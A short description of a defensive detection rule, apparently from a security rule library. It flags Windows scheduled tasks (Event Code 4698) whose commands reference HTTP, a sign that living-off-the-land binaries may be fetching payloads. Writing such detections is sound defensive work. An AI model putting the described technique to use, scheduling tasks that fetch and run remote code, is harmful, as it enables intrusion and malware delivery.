This rule detects the creation of scheduled tasks on Windows systems that reference HTTP in their command arguments, utilizing Windows Security Event Code 4698. Scheduled tasks can be created via `schtasks.exe` or through the TaskService, and the presence of HTTP in the command is often associated with potential malicious activities including the use of Living off the Land binaries (lolbins) to fetch additional payloads. Such actions pose significant risks like data exfiltration, malware distribution, or unauthorized access, thus warranting prompt investigation and action. The implementation of this detection requires ingestion of specific Windows Event Logs corresponding to task scheduling activity and should be adjusted to filter out any known legitimate uses of scheduled tasks in a given environment.